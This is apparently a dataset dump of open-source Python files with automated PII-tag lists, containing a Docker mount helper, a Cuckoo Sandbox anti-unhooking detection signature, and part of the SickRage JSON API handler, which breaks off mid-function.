_tmp[0], + 'type': _tmp[2], + 'options': _tmp[3] + } + ) + return mount_info + + +def is_dock_obj_mounted(docker_obj): + ''' + Check if the provided docker object, which needs to be an ID, + is currently mounted and should be considered ""busy"" + :param docker_obj: str, must be in ID format + :return: bool True or False + ''' + mount_info = get_mounts_by_path() + devices = [x['device'] for x in mount_info] + # If we can find the ID of the object in the list + # of devices which comes from mount, safe to assume + # it is busy. 
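+    # (Editor's note, not in the original code: `in` performs a substring
+    # test, so docker_obj should be a full ID; a short prefix could match
+    # an unrelated device path and report a false 'busy'.)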
+    return any(docker_obj in x for x in devices)
+
+
+def urllib3_disable_warnings():
+    if 'requests' not in sys.modules:
+        import requests
+    else:
+        requests = sys.modules['requests']
+
+    # On latest Fedora, this is a symlink
+    if hasattr(requests, 'packages'):
+        requests.packages.urllib3.disable_warnings()  # pylint: disable=maybe-no-member
+    else:
+        # But with python-requests-2.4.3-1.el7.noarch, we need
+        # to talk to urllib3 directly
+        have_urllib3 = False
+        try:
+            if 'urllib3' not in sys.modules:
+                import urllib3
+            else:
+                urllib3 = sys.modules['urllib3']
+            have_urllib3 = True
+        except ImportError:
+            pass
+        if have_urllib3:
+            # Only call disable_warnings if it exists
+            if hasattr(urllib3, 'disable_warnings'):
+                urllib3.disable_warnings()
+",8241,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Alex Collins'], ['LOCATION', 'name.strip'], ['PERSON', 'json'], ['PERSON', 'separators='], ['PERSON', 'max'], ['PERSON', 'sevs'], ['PERSON', 'sev'], ['LOCATION', 'sevs'], ['PERSON', 'sev'], ['LOCATION', 'sevs'], ['PERSON', 'sev'], ['URL', 'template.fo'], ['LOCATION', 'sys.modules'], ['URL', 'sys.mo'], ['URL', 'requests.pa'], ['LOCATION', 'sys.modules'], ['URL', 'sys.mo'], ['URL', 'email.com'], ['URL', 'collections.na'], ['URL', 'sys.ve'], ['URL', 'repo.rs'], ['URL', 'docker.Client.im'], ['URL', 'docker.Cl'], ['URL', 'c.im'], ['URL', 'proc.com'], ['URL', 'proc.re'], ['URL', 'selinux.is'], ['URL', 'selinux.se'], ['URL', 'fd.re'], ['URL', 'name.st'], ['URL', 'context.st'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'summary.ke'], ['URL', 'res.ke'], ['URL', 'template.fo'], ['URL', 'summary.ke'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'sys.mo'], ['URL', 'python-requests-2.4.3-1.el7.no']]"
+10,"# Copyright (C) 2014 Claudio ""nex"" Guarnieri (@botherder), Accuvant, Inc. (dummy@email.com)
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+ +from lib.cuckoo.common.abstracts import Signature + +class Unhook(Signature): + name = ""antisandbox_unhook"" + description = ""Tries to unhook or modify Windows functions monitored by Cuckoo"" + severity = 3 + confidence = 60 + categories = [""anti-sandbox""] + authors = [""nex"",""Accuvant""] + minimum = ""1.2"" + evented = True + + filter_categories = set([""__notification__""]) + + def __init__(self, *args, **kwargs): + Signature.__init__(self, *args, **kwargs) + self.saw_unhook = False + self.unhook_info = set() + + def on_call(self, call, process): + subcategory = self.check_argument_call(call, + api=""__anomaly__"", + name=""Subcategory"", + pattern=""unhook"") + if subcategory: + self.saw_unhook = True + funcname = self.get_argument(call, ""FunctionName"") + if funcname != """": + if (funcname != ""SetUnhandledExceptionFilter"" and funcname != ""SetWindowsHookExW"" and funcname != ""UnhookWindowsHookEx"" and + funcname != ""CoCreateInstance"") or self.get_argument(call, ""UnhookType"") != ""modification"": + self.unhook_info.add(""function_name: "" + funcname + "", type: "" + self.get_argument(call, ""UnhookType"")) + + def on_complete(self): + if len(self.unhook_info) > 5: + weight = len(self.unhook_info) + confidence = 100 + + if not self.unhook_info: + self.saw_unhook = False + + for info in self.unhook_info: + self.data.append({""unhook"" : info }) + return self.saw_unhook +",2422,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Claudio'], ['PERSON', 'Guarnieri'], ['PERSON', 'api=""__anomaly'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'lib.cuckoo.com'], ['URL', 'self.sa'], ['URL', 'self.ch'], ['URL', 'self.sa'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'info.ad'], ['URL', 'self.ge'], ['URL', 'self.sa'], ['URL', 'self.sa']]" +11,"# coding=utf-8 +# Author: Dennis Lutter dummy@email.com +# Author: Jonathon Saine dummy@email.com +# URL: http://code.google.com/p/sickbeard/ +# +# This file is part of SickRage. +# +# SickRage is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# SickRage is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with SickRage. If not, see . 
+ +# TODO: break this up into separate files +# pylint: disable=C0301,C0302 +# pylint: disable=E1101,E0202,C0111,C0103 + +import io +import os +import re +import time +import urllib +import datetime +import traceback + +import sickbeard +from sickrage.helper.common import dateFormat, dateTimeFormat, pretty_file_size, sanitize_filename, timeFormat +from sickrage.helper.encoding import ek +from sickrage.helper.exceptions import CantUpdateShowException, ex, ShowDirectoryNotFoundException +from sickrage.helper.quality import get_quality_string +from sickrage.media.ShowFanArt import ShowFanArt +from sickrage.media.ShowNetworkLogo import ShowNetworkLogo +from sickrage.media.ShowPoster import ShowPoster +from sickrage.media.ShowBanner import ShowBanner +from sickrage.show.ComingEpisodes import ComingEpisodes +from sickrage.show.History import History +from sickrage.show.Show import Show +from sickrage.system.Restart import Restart +from sickrage.system.Shutdown import Shutdown +from sickbeard.versionChecker import CheckVersion +from sickbeard import db, logger, ui, helpers +from sickbeard import search_queue +from sickbeard import image_cache +from sickbeard import classes +from sickbeard import processTV +from sickbeard import network_timezones, sbdatetime +from sickbeard.common import DOWNLOADED +from sickbeard.common import FAILED +from sickbeard.common import IGNORED +from sickbeard.common import Overview +from sickbeard.common import Quality +from sickbeard.common import SKIPPED +from sickbeard.common import SNATCHED +from sickbeard.common import SNATCHED_PROPER +from sickbeard.common import UNAIRED +from sickbeard.common import UNKNOWN +from sickbeard.common import WANTED +from sickbeard.common import ARCHIVED +from sickbeard.common import statusStrings + +try: + import json +except ImportError: + # pylint: disable=F0401 + import simplejson as json + +# pylint: disable=F0401 +from tornado.web import RequestHandler + +indexer_ids = [""indexerid"", ""tvdbid""] + +RESULT_SUCCESS = 10 # only use inside the run methods +RESULT_FAILURE = 20 # only use inside the run methods +RESULT_TIMEOUT = 30 # not used yet :( +RESULT_ERROR = 40 # only use outside of the run methods ! +RESULT_FATAL = 50 # only use in Api.default() ! this is the ""we encountered an internal error"" error +RESULT_DENIED = 60 # only use in Api.default() ! this is the access denied error +result_type_map = { + RESULT_SUCCESS: ""success"", + RESULT_FAILURE: ""failure"", + RESULT_TIMEOUT: ""timeout"", + RESULT_ERROR: ""error"", + RESULT_FATAL: ""fatal"", + RESULT_DENIED: ""denied"", +} + + +# basically everything except RESULT_SUCCESS / success is bad + + +class ApiHandler(RequestHandler): + """""" api class that returns json results """""" + version = 5 # use an int since float-point is unpredictable + + def __init__(self, *args, **kwargs): + super(ApiHandler, self).__init__(*args, **kwargs) + + # def set_default_headers(self): + # self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0') + + def get(self, *args, **kwargs): + kwargs = self.request.arguments + for arg, value in kwargs.iteritems(): + if len(value) == 1: + kwargs[arg] = value[0] + + args = args[1:] + + # set the output callback + # default json + output_callback_dict = { + 'default': self._out_as_json, + 'image': self._out_as_image, + } + + access_msg = u""API :: "" + self.request.remote_ip + "" - gave correct API KEY. 
ACCESS GRANTED"" + logger.log(access_msg, logger.DEBUG) + + # set the original call_dispatcher as the local _call_dispatcher + _call_dispatcher = self.call_dispatcher + # if profile was set wrap ""_call_dispatcher"" in the profile function + if 'profile' in kwargs: + from profilehooks import profile + + _call_dispatcher = profile(_call_dispatcher, immediate=True) + del kwargs[""profile""] + + try: + out_dict = _call_dispatcher(args, kwargs) + except Exception, e: # real internal error oohhh nooo :( + logger.log(u""API :: "" + ex(e), logger.ERROR) + error_data = { + ""error_msg"": ex(e), + ""args"": args, + ""kwargs"": kwargs + } + out_dict = _responds(RESULT_FATAL, error_data, + ""SickRage encountered an internal error! Please report to the Devs"") + + if 'outputType' in out_dict: + output_callback = output_callback_dict[out_dict['outputType']] + else: + output_callback = output_callback_dict['default'] + + try: + self.finish(output_callback(out_dict)) + except Exception: + pass + + def _out_as_image(self, _dict): + self.set_header('Content-Type', _dict['image'].get_media_type()) + return _dict['image'].get_media() + + def _out_as_json(self, _dict): + self.set_header(""Content-Type"", ""application/json;charset=UTF-8"") + try: + out = json.dumps(_dict, ensure_ascii=False, sort_keys=True) + callback = self.get_query_argument('callback', None) or self.get_query_argument('jsonp', None) + if callback: + out = callback + '(' + out + ');' # wrap with JSONP call if requested + except Exception, e: # if we fail to generate the output fake an error + logger.log(u""API :: "" + traceback.format_exc(), logger.DEBUG) + out = '{""result"": ""%s"", ""message"": ""error while composing output: %s""}' % \ + (result_type_map[RESULT_ERROR], ex(e)) + return out + + def call_dispatcher(self, args, kwargs): + """""" calls the appropriate CMD class + looks for a cmd in args and kwargs + or calls the TVDBShorthandWrapper when the first args element is a number + or returns an error that there is no such cmd + """""" + logger.log(u""API :: all args: '"" + str(args) + ""'"", logger.DEBUG) + logger.log(u""API :: all kwargs: '"" + str(kwargs) + ""'"", logger.DEBUG) + + commands = None + if args: + commands, args = args[0], args[1:] + commands = kwargs.pop(""cmd"", commands) + + out_dict = {} + if commands: + commands = commands.split(""|"") + multi_commands = len(commands) > 1 + for cmd in commands: + cur_args, cur_kwargs = self.filter_params(cmd, args, kwargs) + + if len(cmd.split(""_"")) > 1: + cmd, cmd_index = cmd.split(""_"") + + logger.log(u""API :: "" + cmd + "": cur_kwargs "" + str(cur_kwargs), logger.DEBUG) + if not (cmd in ('show.getbanner', 'show.getfanart', 'show.getnetworklogo', 'show.getposter') and + multi_commands): # skip these cmd while chaining + try: + if cmd in function_mapper: + func = function_mapper.get(cmd) # map function + func.rh = self # add request handler to function + cur_out_dict = func(cur_args, cur_kwargs).run() # call function and get response + elif _is_int(cmd): + cur_out_dict = TVDBShorthandWrapper(cur_args, cur_kwargs, cmd).run() + else: + cur_out_dict = _responds(RESULT_ERROR, ""No such cmd: '"" + cmd + ""'"") + except ApiError as error: # Api errors that we raised, they are harmless + cur_out_dict = _responds(RESULT_ERROR, msg=ex(error)) + else: # if someone chained one of the forbidden commands they will get an error for this one cmd + cur_out_dict = _responds(RESULT_ERROR, msg=""The cmd '"" + cmd + ""' is not supported while chaining"") + + if multi_commands: + # note: if 
duplicate commands are issued and one has an index defined it will override
+                    # all others or the other way around, depending on the command order
+                    # THIS IS NOT A BUG!
+                    if cmd_index:  # do we need an index dict for this cmd ?
+                        if cmd not in out_dict:
+                            out_dict[cmd] = {}
+                        out_dict[cmd][cmd_index] = cur_out_dict
+                    else:
+                        out_dict[cmd] = cur_out_dict
+                else:
+                    out_dict = cur_out_dict
+
+            if multi_commands:  # if we had multiple commands we have to wrap it in a response dict
+                out_dict = _responds(RESULT_SUCCESS, out_dict)
+        else:  # index / no cmd given
+            out_dict = CMD_SickBeard(args, kwargs).run()
+
+        return out_dict
+
+    def filter_params(self, cmd, args, kwargs):
+        """""" return only params kwargs that are for cmd
+            and rename them to a clean version (remove ""_"")
+            args are shared across all commands
+
+            all args and kwargs are lowered
+
+            cmds are separated by ""|"" e.g. &cmd=shows|future
+            kwargs are name-spaced with ""."" e.g. show.indexerid=101501
+            if a kwarg has no namespace it is applied to all commands (global)
+
+            full e.g.
+            /api?apikey=1234&cmd=show.seasonlist_asd|show.seasonlist_2&show.seasonlist_asd.indexerid=101501&show.seasonlist_2.indexerid=79488&sort=asc
+
+            two calls of show.seasonlist
+            one has the index ""asd"" the other one ""2""
+            the ""indexerid"" kwargs / params have the indexed cmd as a namespace
+            and the kwarg / param ""sort"" is used as a global
+        """"""
+        cur_args = []
+        for arg in args:
+            cur_args.append(arg.lower())
+        cur_args = tuple(cur_args)
+
+        cur_kwargs = {}
+        for kwarg in kwargs:
+            if kwarg.find(cmd + ""."") == 0:
+                clean_key = kwarg.rpartition(""."")[2]
+                cur_kwargs[clean_key] = kwargs[kwarg].lower()
+            elif ""."" not in kwarg:  # the kwarg was not name-spaced therefore a ""global""
+                cur_kwargs[kwarg] = kwargs[kwarg]
+        return cur_args, cur_kwargs
+
+
+class ApiCall(ApiHandler):
+
+    _help = {""desc"": ""This command is not documented. Please report this to the developers.""}
+
+    def __init__(self, args, kwargs):
+        # missing
+        try:
+            if self._missing:
+                self.run = self.return_missing
+        except AttributeError:
+            pass
+
+        # help
+        if 'help' in kwargs:
+            self.run = self.return_help
+
+    def run(self):
+        # override with real output function in subclass
+        return {}
+
+    def return_help(self):
+        try:
+            if self._requiredParams:
+                pass
+        except AttributeError:
+            self._requiredParams = []
+        try:
+            if self._optionalParams:
+                pass
+        except AttributeError:
+            self._optionalParams = []
+
+        for paramDict, paramType in [(self._requiredParams, ""requiredParameters""),
+                                     (self._optionalParams, ""optionalParameters"")]:
+
+            if paramType in self._help:
+                for paramName in paramDict:
+                    if paramName not in self._help[paramType]:
+                        self._help[paramType][paramName] = {}
+                    if paramDict[paramName][""allowed_values""]:
+                        self._help[paramType][paramName][""allowed_values""] = paramDict[paramName][""allowed_values""]
+                    else:
+                        self._help[paramType][paramName][""allowed_values""] = ""see desc""
+                    self._help[paramType][paramName][""defaultValue""] = paramDict[paramName][""defaultValue""]
+                    self._help[paramType][paramName][""type""] = paramDict[paramName][""type""]
+
+            elif paramDict:
+                for paramName in paramDict:
+                    self._help[paramType] = {}
+                    self._help[paramType][paramName] = paramDict[paramName]
+            else:
+                self._help[paramType] = {}
+        msg = ""No description available""
+        if ""desc"" in self._help:
+            msg = self._help[""desc""]
+        return _responds(RESULT_SUCCESS, self._help, msg)
+
+    def return_missing(self):
+        if len(self._missing) == 1:
+            msg = ""The required parameter: '"" + self._missing[0] + ""' was not set""
+        else:
+            msg = ""The required parameters: '"" + ""','"".join(self._missing) + ""' were not set""
+        return _responds(RESULT_ERROR, msg=msg)
+
+    def check_params(self, args, kwargs, key, default, required, arg_type, allowed_values):
+
+        """""" function to check passed params for the shorthand wrapper
+            and to detect missing/required params
+        """"""
+
+        # auto-select indexer
+        if key in indexer_ids:
+            if ""tvdbid"" in kwargs:
+                key = ""tvdbid""
+
+            self.indexer = indexer_ids.index(key)
+
+        missing = True
+        org_default = default
+
+        if arg_type == ""bool"":
+            allowed_values = [0, 1]
+
+        if args:
+            default = args[0]
+            missing = False
+            args = args[1:]
+        if kwargs.get(key):
+            default = kwargs.get(key)
+            missing = False
+        if required:
+            try:
+                self._missing
+                self._requiredParams.append(key)
+            except AttributeError:
+                self._missing = []
+                self._requiredParams = {key: {""allowed_values"": allowed_values,
+                                              ""defaultValue"": org_default,
+                                              ""type"": arg_type}}
+
+            if missing and key not in self._missing:
+                self._missing.append(key)
+        else:
+            try:
+                self._optionalParams[key] = {""allowed_values"": allowed_values,
+                                             ""defaultValue"": org_default,
+                                             ""type"": arg_type}
+            except AttributeError:
+                self._optionalParams = {key: {""allowed_values"": allowed_values,
+                                              ""defaultValue"": org_default,
+                                              ""type"": arg_type}}
+
+        if default:
+            default = self._check_param_type(default, key, arg_type)
+            if arg_type == ""bool"":
+                arg_type = []
+            self._check_param_value(default, key, allowed_values)
+
+        return default, args
+
+    def _check_param_type(self, value, name, arg_type):
+        """""" checks if value can be converted / parsed to arg_type
+            will raise an error on failure
+            or will convert it to arg_type and return new converted value
+            can check for:
+            - int: will be converted into int
+            - bool: will be converted to False / True
+            - list: will always return a list
+            - string: will do nothing for now
+            - ignore: will ignore it, just like ""string""
+        """"""
+        error = False
+        if arg_type == ""int"":
+            if _is_int(value):
+                value = int(value)
+            else:
+                error = True
+        elif arg_type == ""bool"":
+            if value in (""0"", ""1""):
+                value = bool(int(value))
+            elif value in (""true"", ""True"", ""TRUE""):
+                value = True
+            elif value in (""false"", ""False"", ""FALSE""):
+                value = False
+            elif value not in (True, False):
+                error = True
+        elif arg_type == ""list"":
+            value = value.split(""|"")
+        elif arg_type == ""string"":
+            pass
+        elif arg_type == ""ignore"":
+            pass
+        else:
+            logger.log(u'API :: Invalid param type: ""%s"" can not be checked. Ignoring it.' % str(arg_type), logger.ERROR)
+
+        if error:
+            # this is a real ApiError !!
+            raise ApiError(u'param ""%s"" with given value ""%s"" could not be parsed into ""%s""'
+                           % (str(name), str(value), str(arg_type)))
+
+        return value
+
+    def _check_param_value(self, value, name, allowed_values):
+        """""" will check if value (or all values in it) are in allowed values
+            will raise an exception if value is ""out of range""
+            if bool(allowed_value) is False a check is not performed and all values are accepted
+        """"""
+        if allowed_values:
+            error = False
+            if isinstance(value, list):
+                for item in value:
+                    if item not in allowed_values:
+                        error = True
+            else:
+                if value not in allowed_values:
+                    error = True
+
+            if error:
+                # this is kinda an ApiError but raising an error is the only way of quitting here
+                raise ApiError(u""param: '"" + str(name) + ""' with given value: '"" + str(
+                    value) + ""' is out of allowed range '"" + str(allowed_values) + ""'"")
+
+
+class TVDBShorthandWrapper(ApiCall):
+    _help = {""desc"": ""This is an internal function wrapper. Call the help command directly for more information.""}
+
+    def __init__(self, args, kwargs, sid):
+        self.origArgs = args
+        self.kwargs = kwargs
+        self.sid = sid
+
+        self.s, args = self.check_params(args, kwargs, ""s"", None, False, ""ignore"", [])
+        self.e, args = self.check_params(args, kwargs, ""e"", None, False, ""ignore"", [])
+        self.args = args
+
+        ApiCall.__init__(self, args, kwargs)
+
+    def run(self):
+        """""" internal function wrapper """"""
+        args = (self.sid,) + self.origArgs
+        if self.e:
+            return CMD_Episode(args, self.kwargs).run()
+        elif self.s:
+            return CMD_ShowSeasons(args, self.kwargs).run()
+        else:
+            return CMD_Show(args, self.kwargs).run()
+
+
+# ###############################
+#       helper functions        #
+# ###############################
+
+def _is_int(data):
+    try:
+        int(data)
+    except (TypeError, ValueError, OverflowError):
+        return False
+    else:
+        return True
+
+
+def _rename_element(dict_obj, old_key, new_key):
+    try:
+        dict_obj[new_key] = dict_obj[old_key]
+        del dict_obj[old_key]
+    except (ValueError, TypeError, NameError):
+        pass
+    return dict_obj
+
+
+def _responds(result_type, data=None, msg=""""):
+    """"""
+    result is a string of given ""type"" (success/failure/timeout/error)
+    message is a human readable string, can be empty
+    data is either a dict or an array, and can be an empty dict or empty array
+    """"""
+    return {""result"": result_type_map[result_type],
+            ""message"": msg,
+            ""data"": {} if not data else data}
+
+
+def _get_status_strings(s):
+    return statusStrings[s]
+
+
+def _ordinal_to_datetime_form(ordinal):
+    # workaround for episodes with no air date
+    if int(ordinal) != 1:
+        date = datetime.date.fromordinal(ordinal)
+    else:
+        return """"
+    return date.strftime(dateTimeFormat)
+
+
+def _ordinal_to_date_form(ordinal):
+    if int(ordinal) != 1:
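+        # as in _ordinal_to_datetime_form above, an ordinal of 1 is the
+        # sentinel value stored for episodes with no air date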
date = datetime.date.fromordinal(ordinal) + else: + return """" + return date.strftime(dateFormat) + + +def _history_date_to_datetime_form(time_string): + date = datetime.datetime.strptime(time_string, History.date_format) + return date.strftime(dateTimeFormat) + + +def _map_quality(show_obj): + quality_map = _get_quality_map() + + any_qualities = [] + best_qualities = [] + + i_quality_id, a_quality_id = Quality.splitQuality(int(show_obj)) + if i_quality_id: + for quality in i_quality_id: + any_qualities.append(quality_map[quality]) + if a_quality_id: + for quality in a_quality_id: + best_qualities.append(quality_map[quality]) + return any_qualities, best_qualities + + +def _get_quality_map(): + return {Quality.SDTV: 'sdtv', + Quality.SDDVD: 'sddvd', + Quality.HDTV: 'hdtv', + Quality.RAWHDTV: 'rawhdtv', + Quality.FULLHDTV: 'fullhdtv', + Quality.HDWEBDL: 'hdwebdl', + Quality.FULLHDWEBDL: 'fullhdwebdl', + Quality.HDBLURAY: 'hdbluray', + Quality.FULLHDBLURAY: 'fullhdbluray', + Quality.UNKNOWN: 'unknown'} + + +def _get_root_dirs(): + if sickbeard.ROOT_DIRS == """": + return {} + + root_dir = {} + root_dirs = sickbeard.ROOT_DIRS.split('|') + default_index = int(sickbeard.ROOT_DIRS.split('|')[0]) + + root_dir[""default_index""] = int(sickbeard.ROOT_DIRS.split('|')[0]) + # remove default_index value from list (this fixes the offset) + root_dirs.pop(0) + + if len(root_dirs) < default_index: + return {} + + # clean up the list - replace %xx escapes by their single-character equivalent + root_dirs = [urllib.unquote_plus(x) for x in root_dirs] + + default_dir = root_dirs[default_index] + + dir_list = [] + for root_dir in root_dirs: + valid = 1 + try: + ek(os.listdir, root_dir) + except Exception: + valid = 0 + default = 0 + if root_dir is default_dir: + default = 1 + + cur_dir = { + 'valid': valid, + 'location': root_dir, + 'default': default + } + dir_list.append(cur_dir) + + return dir_list + + +class ApiError(Exception): + """""" + Generic API error + """""" + + +class IntParseError(Exception): + """""" + A value could not be parsed into an int, but should be parse-able to an int + """""" + + +# -------------------------------------------------------------------------------------# + + +class CMD_Help(ApiCall): + _help = { + ""desc"": ""Get help about a given command"", + ""optionalParameters"": { + ""subject"": {""desc"": ""The name of the command to get the help of""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.subject, args = self.check_params(args, kwargs, ""subject"", ""help"", False, ""string"", function_mapper.keys()) + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get help about a given command """""" + if self.subject in function_mapper: + out = _responds(RESULT_SUCCESS, function_mapper.get(self.subject)((), {""help"": 1}).run()) + else: + out = _responds(RESULT_FAILURE, msg=""No such cmd"") + return out + + +class CMD_ComingEpisodes(ApiCall): + _help = { + ""desc"": ""Get the coming episodes"", + ""optionalParameters"": { + ""sort"": {""desc"": ""Change the sort order""}, + ""type"": {""desc"": ""One or more categories of coming episodes, separated by |""}, + ""paused"": { + ""desc"": ""0 to exclude paused shows, 1 to include them, or omitted to use SickRage default value"" + }, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.sort, args = self.check_params(args, kwargs, ""sort"", ""date"", False, ""string"", ComingEpisodes.sorts.keys()) + self.type, args = self.check_params(args, kwargs, ""type"", 
'|'.join(ComingEpisodes.categories), False, ""list"", + ComingEpisodes.categories) + self.paused, args = self.check_params(args, kwargs, ""paused"", bool(sickbeard.COMING_EPS_DISPLAY_PAUSED), False, + ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the coming episodes """""" + grouped_coming_episodes = ComingEpisodes.get_coming_episodes(self.type, self.sort, True, self.paused) + data = {section: [] for section in grouped_coming_episodes.keys()} + + for section, coming_episodes in grouped_coming_episodes.iteritems(): + for coming_episode in coming_episodes: + data[section].append({ + 'airdate': coming_episode['airdate'], + 'airs': coming_episode['airs'], + 'ep_name': coming_episode['name'], + 'ep_plot': coming_episode['description'], + 'episode': coming_episode['episode'], + 'indexerid': coming_episode['indexer_id'], + 'network': coming_episode['network'], + 'paused': coming_episode['paused'], + 'quality': coming_episode['quality'], + 'season': coming_episode['season'], + 'show_name': coming_episode['show_name'], + 'show_status': coming_episode['status'], + 'tvdbid': coming_episode['tvdbid'], + 'weekday': coming_episode['weekday'] + }) + + return _responds(RESULT_SUCCESS, data) + + +class CMD_Episode(ApiCall): + _help = { + ""desc"": ""Get detailed information about an episode"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""season"": {""desc"": ""The season number""}, + ""episode"": {""desc"": ""The episode number""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""full_path"": { + ""desc"": ""Return the full absolute show location (if valid, and True), or the relative show location"" + }, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", []) + self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", []) + # optional + self.fullPath, args = self.check_params(args, kwargs, ""full_path"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get detailed information about an episode """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + my_db = db.DBConnection(row_type=""dict"") + sql_results = my_db.select( + ""SELECT name, description, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND episode = ? AND season = ?"", + [self.indexerid, self.e, self.s]) + if not len(sql_results) == 1: + raise ApiError(""Episode not found"") + episode = sql_results[0] + # handle path options + # absolute vs relative vs broken + show_path = None + try: + show_path = show_obj.location + except ShowDirectoryNotFoundException: + pass + + if not show_path: # show dir is broken ... 
episode path will be empty
+            episode[""location""] = """"
+        elif not self.fullPath:
+            # using the length because lstrip() removes too much
+            show_path_length = len(show_path) + 1  # +1 for the / or \ separator
+            episode[""location""] = episode[""location""][show_path_length:]
+
+        # convert stuff to human form
+        if helpers.tryInt(episode['airdate'], 1) > 693595:  # 1900
+            episode['airdate'] = sbdatetime.sbdatetime.sbfdate(sbdatetime.sbdatetime.convert_to_setting(
+                network_timezones.parse_date_time(int(episode['airdate']), show_obj.airs, show_obj.network)), d_preset=dateFormat)
+        else:
+            episode['airdate'] = 'Never'
+
+        status, quality = Quality.splitCompositeStatus(int(episode[""status""]))
+        episode[""status""] = _get_status_strings(status)
+        episode[""quality""] = get_quality_string(quality)
+        episode[""file_size_human""] = pretty_file_size(episode[""file_size""])
+
+        return _responds(RESULT_SUCCESS, episode)
+
+
+class CMD_EpisodeSearch(ApiCall):
+    _help = {
+        ""desc"": ""Search for an episode. The response might take some time."",
+        ""requiredParameters"": {
+            ""indexerid"": {""desc"": ""Unique ID of a show""},
+            ""season"": {""desc"": ""The season number""},
+            ""episode"": {""desc"": ""The episode number""},
+        },
+        ""optionalParameters"": {
+            ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},
+        }
+    }
+
+    def __init__(self, args, kwargs):
+        # required
+        self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])
+        self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", [])
+        self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", [])
+        # optional
+        # super, missing, help
+        ApiCall.__init__(self, args, kwargs)
+
+    def run(self):
+        """""" Search for an episode """"""
+        show_obj = Show.find(sickbeard.showList, int(self.indexerid))
+        if not show_obj:
+            return _responds(RESULT_FAILURE, msg=""Show not found"")
+
+        # retrieve the episode object and fail if we can't get one
+        ep_obj = show_obj.getEpisode(int(self.s), int(self.e))
+        if isinstance(ep_obj, str):
+            return _responds(RESULT_FAILURE, msg=""Episode not found"")
+
+        # make a queue item for it and put it on the queue
+        ep_queue_item = search_queue.ManualSearchQueueItem(show_obj, ep_obj)
+        sickbeard.searchQueueScheduler.action.add_item(ep_queue_item)  # @UndefinedVariable
+
+        # wait until the queue item tells us whether it worked or not
+        while ep_queue_item.success is None:  # @UndefinedVariable
+            time.sleep(1)
+
+        # return the correct json value
+        if ep_queue_item.success:
+            status, quality = Quality.splitCompositeStatus(ep_obj.status)  # @UnusedVariable
+            # TODO: split quality and status?
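+            # splitCompositeStatus above unpacks the composite status integer
+            # into its (status, quality) parts; only the quality is reported
+            # back to the caller below.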
+ return _responds(RESULT_SUCCESS, {""quality"": get_quality_string(quality)}, + ""Snatched ("" + get_quality_string(quality) + "")"") + + return _responds(RESULT_FAILURE, msg='Unable to find episode') + + +class CMD_EpisodeSetStatus(ApiCall): + _help = { + ""desc"": ""Set the status of an episode or a season (when no episode is provided)"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""season"": {""desc"": ""The season number""}, + ""status"": {""desc"": ""The status of the episode or season""} + }, + ""optionalParameters"": { + ""episode"": {""desc"": ""The episode number""}, + ""force"": {""desc"": ""True to replace existing downloaded episode or season, False otherwise""}, + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", []) + self.status, args = self.check_params(args, kwargs, ""status"", None, True, ""string"", + [""wanted"", ""skipped"", ""ignored"", ""failed""]) + # optional + self.e, args = self.check_params(args, kwargs, ""episode"", None, False, ""int"", []) + self.force, args = self.check_params(args, kwargs, ""force"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Set the status of an episode or a season (when no episode is provided) """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + # convert the string status to a int + for status in statusStrings: + if str(statusStrings[status]).lower() == str(self.status).lower(): + self.status = status + break + else: # if we don't break out of the for loop we got here. + # the allowed values has at least one item that could not be matched against the internal status strings + raise ApiError(""The status string could not be matched to a status. 
